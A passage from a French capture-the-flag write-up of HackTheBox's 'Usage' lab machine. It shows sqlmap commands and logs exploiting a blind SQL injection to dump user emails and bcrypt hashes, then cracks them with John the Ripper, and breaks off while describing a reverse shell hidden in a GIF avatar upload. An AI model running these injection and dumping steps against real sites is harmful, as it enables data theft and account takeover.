class="o">[</span>23:37:20<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: ______________ </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>WARNING<span class="o">]</span> <span class="k">if</span> the problem persists please try to lower the number of used threads <span class="o">(</span>option <span class="s1">&#39;--threads&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:38:06<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> connection timed out to the target URL. sqlmap is going to retry the request<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl">there seems to be a continuous problem with connection to the target. Are you sure that you want to <span class="k">continue</span>? <span class="o">[</span>y/N<span class="o">]</span> N </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice <span class="o">(</span>breaking warranty<span class="o">)</span> <span class="o">[</span>y/N<span class="o">]</span> N </span></span><span class="line"><span class="cl"><span class="o">[</span>23:39:07<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: </span></span><span class="line"><span class="cl"><span class="o">[</span>23:39:07<span class="o">]</span> <span class="o">[</span>WARNING<span class="o">]</span> it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions </span></span><span class="line"><span class="cl"><span class="o">[</span>23:39:07<span class="o">]</span> <span class="o">[</span>CRITICAL<span class="o">]</span> considerable lagging has been detected in connection response<span class="o">(</span>s<span class="o">)</span>. Please use as high value <span class="k">for</span> option <span class="s1">&#39;--time-sec&#39;</span> as possible <span class="o">(</span>e.g. <span class="m">10</span> or more<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:39:37<span class="o">]</span> <span class="o">[</span>WARNING<span class="o">]</span> HTTP error codes detected during run: </span></span><span class="line"><span class="cl"><span class="m">500</span> <span class="o">(</span>Internal Server Error<span class="o">)</span> - <span class="m">477</span> <span class="nb">times</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:39:37<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetched data logged to text files under <span class="s1">&#39;/home/leopold/.local/share/sqlmap/output/usage.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:39:37<span class="o">]</span> <span class="o">[</span>WARNING<span class="o">]</span> your sqlmap version is outdated </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ending @ 23:39:37 /2024-08-06/ </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sqlmap -r request.txt --data<span class="o">=</span><span class="s2">&#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#34;</span> -p email --batch --level <span class="m">5</span> --risk <span class="m">3</span> --threads <span class="m">10</span> -D usage_blog -T users -C email --dump </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span><span class="s1">&#39;]_____ ___ ___ {1.6.4#stable} </span></span></span><span class="line"><span class="cl"><span class="s1">|_ -| . [(] | .&#39;</span><span class="p">|</span> . <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>___<span class="p">|</span>_ <span class="o">[(]</span>_<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span>__,<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span>V... <span class="p">|</span>_<span class="p">|</span> https://sqlmap.org </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> legal disclaimer: Usage of sqlmap <span class="k">for</span> attacking targets without prior mutual consent is illegal. It is the end user<span class="s1">&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[*] starting @ 23:34:07 /2024-08-06/ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:07] [INFO] parsing HTTP request from &#39;</span>request.txt<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:07] [INFO] resuming back-end DBMS &#39;</span>mysql<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:07] [INFO] testing connection to the target URL </span></span></span><span class="line"><span class="cl"><span class="s1">got a 302 redirect to &#39;</span>http://usage.htb/forget-password<span class="s1">&#39;. Do you want to follow? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s1">redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s1">sqlmap resumed the following injection point(s) from stored session: </span></span></span><span class="line"><span class="cl"><span class="s1">--- </span></span></span><span class="line"><span class="cl"><span class="s1">Parameter: email (POST) </span></span></span><span class="line"><span class="cl"><span class="s1"> Type: boolean-based blind </span></span></span><span class="line"><span class="cl"><span class="s1"> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) </span></span></span><span class="line"><span class="cl"><span class="s1"> Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#39;</span> AND <span class="nv">5458</span><span class="o">=(</span>SELECT <span class="o">(</span>CASE WHEN <span class="o">(</span><span class="nv">5458</span><span class="o">=</span>5458<span class="o">)</span> THEN <span class="m">5458</span> ELSE <span class="o">(</span>SELECT <span class="m">4624</span> UNION SELECT 6593<span class="o">)</span> END<span class="o">))</span>-- UEue </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Type: time-based blind </span></span><span class="line"><span class="cl"> Title: MySQL &gt; 5.0.12 AND time-based blind <span class="o">(</span>heavy query<span class="o">)</span> </span></span><span class="line"><span class="cl"> Payload: <span class="nv">_token</span><span class="o">=</span>SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh<span class="p">&amp;</span><span class="nv">email</span><span class="o">=</span>leopold<span class="s1">&#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX </span></span></span><span class="line"><span class="cl"><span class="s1">--- </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:10] [INFO] the back-end DBMS is MySQL </span></span></span><span class="line"><span class="cl"><span class="s1">web server operating system: Linux Ubuntu </span></span></span><span class="line"><span class="cl"><span class="s1">web application technology: Nginx 1.18.0 </span></span></span><span class="line"><span class="cl"><span class="s1">back-end DBMS: MySQL &gt; 5.0.12 </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:10] [INFO] fetching entries of column(s) &#39;</span>email<span class="s1">&#39; for table &#39;</span>users<span class="s1">&#39; in database &#39;</span>usage_blog<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:10] [INFO] fetching number of column(s) &#39;</span>email<span class="s1">&#39; entries for table &#39;</span>users<span class="s1">&#39; in database &#39;</span>usage_blog<span class="err">&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: </span></span><span class="line"><span class="cl">you provided a HTTP Cookie header value, <span class="k">while</span> target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? <span class="o">[</span>Y/n<span class="o">]</span> Y </span></span><span class="line"><span class="cl"><span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:19<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:19<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">23</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:35:24<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: brm@brunorochamoura.com </span></span><span class="line"><span class="cl"><span class="o">[</span>23:35:24<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:35:24<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">15</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:36:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: davy@wavy.gravy </span></span><span class="line"><span class="cl"><span class="o">[</span>23:36:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:36:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">11</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:09<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: raj@raj.com </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:09<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:09<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">13</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:20<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: _____________ </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sqlmap -r request.txt --data<span class="o">=</span><span class="s2">&#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#34;</span> -p email --batch --level <span class="m">5</span> --risk <span class="m">3</span> --threads <span class="m">10</span> -D usage_blog -T users -C password --dump </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span>.<span class="o">]</span>_____ ___ ___ <span class="o">{</span>1.6.4#stable<span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ -<span class="p">|</span> . <span class="o">[(]</span> <span class="p">|</span> .<span class="s1">&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s1">|___|_ [&#39;</span><span class="o">]</span>_<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span>__,<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span>V... <span class="p">|</span>_<span class="p">|</span> https://sqlmap.org </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> legal disclaimer: Usage of sqlmap <span class="k">for</span> attacking targets without prior mutual consent is illegal. It is the end user<span class="s1">&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[*] starting @ 23:34:22 /2024-08-06/ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:22] [INFO] parsing HTTP request from &#39;</span>request.txt<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:22] [INFO] resuming back-end DBMS &#39;</span>mysql<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:22] [INFO] testing connection to the target URL </span></span></span><span class="line"><span class="cl"><span class="s1">got a 302 redirect to &#39;</span>http://usage.htb/forget-password<span class="s1">&#39;. Do you want to follow? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s1">redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s1">sqlmap resumed the following injection point(s) from stored session: </span></span></span><span class="line"><span class="cl"><span class="s1">--- </span></span></span><span class="line"><span class="cl"><span class="s1">Parameter: email (POST) </span></span></span><span class="line"><span class="cl"><span class="s1"> Type: boolean-based blind </span></span></span><span class="line"><span class="cl"><span class="s1"> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) </span></span></span><span class="line"><span class="cl"><span class="s1"> Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#39;</span> AND <span class="nv">5458</span><span class="o">=(</span>SELECT <span class="o">(</span>CASE WHEN <span class="o">(</span><span class="nv">5458</span><span class="o">=</span>5458<span class="o">)</span> THEN <span class="m">5458</span> ELSE <span class="o">(</span>SELECT <span class="m">4624</span> UNION SELECT 6593<span class="o">)</span> END<span class="o">))</span>-- UEue </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Type: time-based blind </span></span><span class="line"><span class="cl"> Title: MySQL &gt; 5.0.12 AND time-based blind <span class="o">(</span>heavy query<span class="o">)</span> </span></span><span class="line"><span class="cl"> Payload: <span class="nv">_token</span><span class="o">=</span>SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh<span class="p">&amp;</span><span class="nv">email</span><span class="o">=</span>leopold<span class="s1">&#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX </span></span></span><span class="line"><span class="cl"><span class="s1">--- </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:25] [INFO] the back-end DBMS is MySQL </span></span></span><span class="line"><span class="cl"><span class="s1">web server operating system: Linux Ubuntu </span></span></span><span class="line"><span class="cl"><span class="s1">web application technology: Nginx 1.18.0 </span></span></span><span class="line"><span class="cl"><span class="s1">back-end DBMS: MySQL &gt; 5.0.12 </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:25] [INFO] fetching entries of column(s) &#39;</span>password<span class="s1">&#39; for table &#39;</span>users<span class="s1">&#39; in database &#39;</span>usage_blog<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[23:34:25] [INFO] fetching number of column(s) &#39;</span>password<span class="s1">&#39; entries for table &#39;</span>users<span class="s1">&#39; in database &#39;</span>usage_blog<span class="err">&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:25<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: </span></span><span class="line"><span class="cl">you provided a HTTP Cookie header value, <span class="k">while</span> target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? <span class="o">[</span>Y/n<span class="o">]</span> Y </span></span><span class="line"><span class="cl"><span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:38<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:38<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">60</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:09<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="nv">$2</span>y<span class="nv">$10$7</span>ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:09<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:09<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">60</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:19<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: ____________________________________________________________ </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">brm@brunorochamoura.com </span></span><span class="line"><span class="cl">davy@wavy.gravy </span></span><span class="line"><span class="cl">raj@raj.com </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$2</span>y<span class="nv">$10$7</span>ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. </span></span></code></pre></td></tr></table> </div> </div><h3 id="crack-du-mdp">Crack du mdp </h3><p>On fait une attaque brute force avec john et on trouve le mot de passe suivant pour le hash découvert : <code>xander</code></p> <h3 id="compte">Compte <a class="link" href="mailto:raj@raj.com" >raj@raj.com</a> </h3><p>Après quelques essais, on découvre donc les credentials suivants pour se connecter au website:</p> <blockquote> <p><a class="link" href="mailto:raj@raj.com" >raj@raj.com</a> : xander</p> </blockquote> <p>En realité, ce compte utilisateur est inutile. Par contre, j&rsquo;ai trouvé d&rsquo;autres tables avec les users admin</p> <h3 id="utilisateur-admin">Utilisateur Admin </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Database: usage_blog </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="m">15</span> tables<span class="o">]</span> </span></span><span class="line"><span class="cl">+------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_menu <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_operation_log <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_permissions <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_role_menu <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_role_permissions <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_role_users <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_roles <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_user_permissions <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> admin_users <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> blog <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> failed_jobs <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> migrations <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> password_reset_tokens <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> personal_access_tokens <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> users <span class="p">|</span> </span></span><span class="line"><span class="cl">+------------------------+ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database: usage_blog </span></span><span class="line"><span class="cl">Table: admin_users </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="m">8</span> columns<span class="o">]</span> </span></span><span class="line"><span class="cl">+----------------+--------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Column <span class="p">|</span> Type <span class="p">|</span> </span></span><span class="line"><span class="cl">+----------------+--------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> avatar <span class="p">|</span> varchar<span class="o">(</span>255<span class="o">)</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> created_at <span class="p">|</span> timestamp <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> int unsigned <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> name <span class="p">|</span> varchar<span class="o">(</span>255<span class="o">)</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> password <span class="p">|</span> varchar<span class="o">(</span>60<span class="o">)</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> remember_token <span class="p">|</span> varchar<span class="o">(</span>100<span class="o">)</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> updated_at <span class="p">|</span> timestamp <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> username <span class="p">|</span> varchar<span class="o">(</span>190<span class="o">)</span> <span class="p">|</span> </span></span><span class="line"><span class="cl">+----------------+--------------+ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database: usage_blog </span></span><span class="line"><span class="cl">Table: admin_users </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="m">1</span> entry<span class="o">]</span> </span></span><span class="line"><span class="cl">+----------+--------------------------------------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> username <span class="p">|</span> password <span class="p">|</span> </span></span><span class="line"><span class="cl">+----------+--------------------------------------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> admin <span class="p">|</span> <span class="nv">$2</span>y<span class="nv">$10$ohq2kLpBH</span>/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 <span class="p">|</span> </span></span><span class="line"><span class="cl">+----------+--------------------------------------------------------------+ </span></span></code></pre></td></tr></table> </div> </div><h3 id="crack-admin-password">Crack admin password </h3><blockquote> <p>admin : whatever1</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">john hash.txt --wordlist<span class="o">=</span>~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">Loaded <span class="m">2</span> password hashes with <span class="m">2</span> different salts <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X2<span class="o">])</span> </span></span><span class="line"><span class="cl">Remaining <span class="m">1</span> password <span class="nb">hash</span> </span></span><span class="line"><span class="cl">Will run <span class="m">8</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">0g 0:00:00:20 0% 0g/s 45.39p/s 45.39c/s 45.39C/s wesley..sandy </span></span><span class="line"><span class="cl">whatever1 <span class="o">(</span>?<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:34 100% 0.02906g/s 47.42p/s 47.42c/s 47.42C/s alexis1..punkrock </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed </span></span><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Usage <span class="o">(</span>main*<span class="o">)</span> » john hash.txt --wordlist<span class="o">=</span>~/wordlists/rockyou.txt --show leopold@leopold-ZenBook-UX434FAC-UX434FA </span></span><span class="line"><span class="cl">Invalid options combination or duplicate option: <span class="s2">&#34;--show&#34;</span> </span></span><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Usage <span class="o">(</span>main*<span class="o">)</span> » john hash.txt --show </span></span><span class="line"><span class="cl">?:xander </span></span><span class="line"><span class="cl">?:whatever1 </span></span></code></pre></td></tr></table> </div> </div><h3 id="php-web-shell---dash-user">PHP web shell - dash user </h3><p>On peut désormais se connecter sur la plateforme admin. Le lien de ce sous-domaine etait disponible sur la page d&rsquo;accueil. En se connectant, on trouve une page settings permettant de modifier l&rsquo;avatar de l&rsquo;utilisateur <strong>admin</strong>.</p> <p>On peut alors upload un fichier image. On peut alors cacher un reverse shell dans un fichier <strong>gif</strong> ou un autre format. Au moment de l&rsquo;upload, on 